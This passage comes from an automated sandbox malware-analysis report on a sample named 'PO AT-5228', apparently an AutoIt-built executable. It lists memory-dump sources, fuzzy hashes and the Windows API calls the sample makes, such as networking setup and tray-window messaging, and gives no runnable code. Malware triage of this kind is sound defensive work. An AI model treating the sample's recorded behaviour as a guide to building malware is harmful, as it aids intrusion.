                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
Similarity
• API ID: InfoItemMenu_memset
• String ID: 0
• API String ID: 2223754486-4108050209
• Opcode ID: 5fbcbd06aa4209014500410cedf6d83d4086b480557ceac00b48e95a9ac5fb4c
• Instruction ID: 17d4dbfb6293da296ea1324bcfe2023186570b8151e830c5bd9952052b82757f
• Opcode Fuzzy Hash: 5fbcbd06aa4209014500410cedf6d83d4086b480557ceac00b48e95a9ac5fb4c
• Instruction Fuzzy Hash: FD11D072905714BBDF30DA98D944B9D77E8EB86790F0900A5E942E72A0D7B0EF05CBA0
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00BB4DF5
• InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00BB4E1E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
Similarity
• API ID: Internet$OpenOption
• String ID: <local>
• API String ID: 942729171-4266983199
• Opcode ID: 9e4127fcae1f3d6c1e3fdad91e9d0f21a02ddff5df318e0b18676127691561f6
• Instruction ID: dfe4654b7c25e336420f9dff74a87f2f7adc9c0c45e674336d7eeb93e90d6ac2
• Opcode Fuzzy Hash: 9e4127fcae1f3d6c1e3fdad91e9d0f21a02ddff5df318e0b18676127691561f6
• Instruction Fuzzy Hash: 8711AC70501221BBDB298F61C8C9EFBFAE8FF06755F10826AF51596141D7F09D80C6E0
APIs
• inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00BBA84E
• htons.WSOCK32(00000000,?,00000000), ref: 00BBA88B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
Similarity
• API ID: htonsinet_addr
• String ID: 255.255.255.255
• API String ID: 3832099526-2422070025
• Opcode ID: 84e2483de7a955b42a8ca150a3f5600d3375134d0abbb9e7a019bda08ebea9fa
• Instruction ID: 3ba306fe85e99531d56c7c227b273aae317613ad9e87900ee37902cde88f184e
• Opcode Fuzzy Hash: 84e2483de7a955b42a8ca150a3f5600d3375134d0abbb9e7a019bda08ebea9fa
• Instruction Fuzzy Hash: 7B01C075600304ABCB11AF68CCC6BF9B7A4EF45314F1085AAE5169B6D1DAB1E8058752
APIs
• SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00B9B7EF
Strings
Memory Dump Source
• Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
Similarity
• API ID: MessageSend
• String ID: ComboBox$ListBox
• API String ID: 3850602802-1403004172
• Opcode ID: 38489ed8a7a8391627ded5fc9c601b153e964feaf225fd82649dc8645c2e2c6f
• Instruction ID: 517660ffdd232253d491e49b842490d68bbde649194b1e9a4fbe6ca38c8f64bb
• Opcode Fuzzy Hash: 38489ed8a7a8391627ded5fc9c601b153e964feaf225fd82649dc8645c2e2c6f
• Instruction Fuzzy Hash: 0701F171600118ABCF04EBA4DC82DFE33E9AF06310B04066CF4A2672D2EB7868189790
APIs
• SendMessageW.USER32(?,00000180,00000000,?), ref: 00B9B6EB
Strings
Memory Dump Source
• Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
Similarity
• API ID: MessageSend
• String ID: ComboBox$ListBox
• API String ID: 3850602802-1403004172
• Opcode ID: efda0cfc4e80c3220091d4c7aed1ff1b46b480f6c05d81bf5803db04fe85abbb
• Instruction ID: 93bcbc4db79e5ca1e5673c03dc79e973d3dc30ed6bdbe943c8ccb01e4340dfcc
• Opcode Fuzzy Hash: efda0cfc4e80c3220091d4c7aed1ff1b46b480f6c05d81bf5803db04fe85abbb
• Instruction Fuzzy Hash: F701A275641008ABCF04EBA4DA52EFE77F89F15340F1400B9B442B3181DB986E1897B5
APIs
• SendMessageW.USER32(?,00000182,?,00000000), ref: 00B9B76C
Strings
Memory Dump Source
• Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
Similarity
• API ID: MessageSend
• String ID: ComboBox$ListBox
• API String ID: 3850602802-1403004172
• Opcode ID: 587f4a7d6fe8a258408f60b931070840d1e800b90e9459ca3b54bde0d6aff627
• Instruction ID: 6f8b97f5a2f61a3f1bd03ca64922bd902c43960c1aa3cc820a4bf2bed04cbbc6
• Opcode Fuzzy Hash: 587f4a7d6fe8a258408f60b931070840d1e800b90e9459ca3b54bde0d6aff627
• Instruction Fuzzy Hash: A301D1B5640108ABCF00EBA4DA82EFE73EC9F15340F140179B442B3192DBA95E1997B5
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
Similarity
• API ID: ClassName_wcscmp
• String ID: #32770
• API String ID: 2292705959-463685578
• Opcode ID: 4f9004fd9b4c1d7bd62ebd058e50f07b5021f520f7dfbc905437c5def51e2d4c
• Instruction ID: 5217cda785111e43cb09dc78ffb846b5d64afcad5ad12c9bfa720f711949af88
• Opcode Fuzzy Hash: 4f9004fd9b4c1d7bd62ebd058e50f07b5021f520f7dfbc905437c5def51e2d4c
• Instruction Fuzzy Hash: 15E092776043642BDB20EAA99C49FCBFBACEB52764F0000A6B915D3051DA74AA4287D0
APIs
• MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00B9A63F
  • Part of subcall function 00B813F1: _doexit.LIBCMT ref: 00B813FB
Strings
Memory Dump Source
• Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
Similarity
• API ID: Message_doexit
• String ID: AutoIt$Error allocating memory.
• API String ID: 1993061046-4017498283
• Opcode ID: 1148a3259b6c6c520ffbc1b4d65e3eea24376a6b839638dc4477af13dc7eb610
• Instruction ID: 5f61926cc57e8024fadc6114c774ecb927c45de8d58dcbabb9d0f5643ea9aee7
• Opcode Fuzzy Hash: 1148a3259b6c6c520ffbc1b4d65e3eea24376a6b839638dc4477af13dc7eb610
• Instruction Fuzzy Hash: 76D02B313C031833C31036AC6C0BFD836CC8B15F51F0440A5BB0C9A1D24DD2C69042DD
APIs
• GetSystemDirectoryW.KERNEL32(?), ref: 00BDACC0
• FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00BDAEBD
Strings
Memory Dump Source
• Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
Similarity
• API ID: DirectoryFreeLibrarySystem
• String ID: WIN_XPe
• API String ID: 510247158-3257408948
• Opcode ID: 8003d159634095a7e39d6806a989473f5cf400ef434988646dbd7d6316a912fa
• Instruction ID: 9d9c71fbf56343e67d985e1f5d5fb7dc798a7ace2318c6b6edd0a08977ea6f2b
• Opcode Fuzzy Hash: 8003d159634095a7e39d6806a989473f5cf400ef434988646dbd7d6316a912fa
• Instruction Fuzzy Hash: 5EE0C975C24549AFDB11DBA5DD84AECF7F8EB48301F1880C6E116B6660EB705A84DF22
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00BC86A2
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00BC86B5
  • Part of subcall function 00BA7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00BA7AD0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: b7abcbaf789e121edd1c2a8ad1b89c43c3230e92b578edc699cee9575e468e7d
• Instruction ID: 8ebc469d474ec23765bed53a3423ede9698e5718543d1975c5fca4e158ae127e
• Opcode Fuzzy Hash: b7abcbaf789e121edd1c2a8ad1b89c43c3230e92b578edc699cee9575e468e7d
• Instruction Fuzzy Hash: 5CD0123138C394BBE6646770DC4BFC67A589B15B11F110925B749AF1D0CDF4E940CB54
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00BC86E2
• PostMessageW.USER32(00000000), ref: 00BC86E9
  • Part of subcall function 00BA7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00BA7AD0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
• Opcode ID: 53657d4d2a71802ebc17b5989eb34ea28b246881dfe2aeafc027bab6756e174c
• Instruction ID: 430ca343a8c3a5a1fc8bf518b31ee07475c5f6326f4cda52c306d59069de84cd
• Opcode Fuzzy Hash: 53657d4d2a71802ebc17b5989eb34ea28b246881dfe2aeafc027bab6756e174c
• Instruction Fuzzy Hash: 29D0A9313883947BE22463309C4BFC66A489B05B10F000824B205AE0C0CCE0A9408B14